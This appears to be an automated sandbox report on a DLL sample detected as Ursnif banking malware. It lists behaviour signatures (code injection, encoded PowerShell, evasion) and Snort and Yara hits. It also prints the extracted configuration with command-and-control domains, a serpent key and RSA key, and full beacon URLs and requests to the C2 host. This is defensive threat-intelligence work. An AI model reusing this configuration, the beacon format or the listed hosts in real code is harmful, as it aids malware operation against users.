Windows Analysis Report 2u2mgtylJy.dll

Overview

General Information

Sample Name: 2u2mgtylJy.dll
Analysis ID: 498331
MD5: 503edcfec2262373e36deaa37f640332
SHA1: 37648e8ced69d8adc7be8bde5a61138cbb0f9e6a
SHA256: 3ef3beaa49e07f171927a772a417109df6f137c4fa321dbd17daaa7cb47392be
Tags: dll

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Encoded IEX
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Suspicious powershell command line found
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for URL or domain
Source: http://init.icecreambob.com/c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF Avira URL Cloud: Label: malware

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_032E3FAB

Compliance:

Uses 32bit PE files
Source: 2u2mgtylJy.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 2u2mgtylJy.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49765 -> 194.147.86.221:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETRACK-ASRU NETRACK-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000010.00000003.470111978.00000225DF294000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: unknown DNS traffic detected: queries for: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
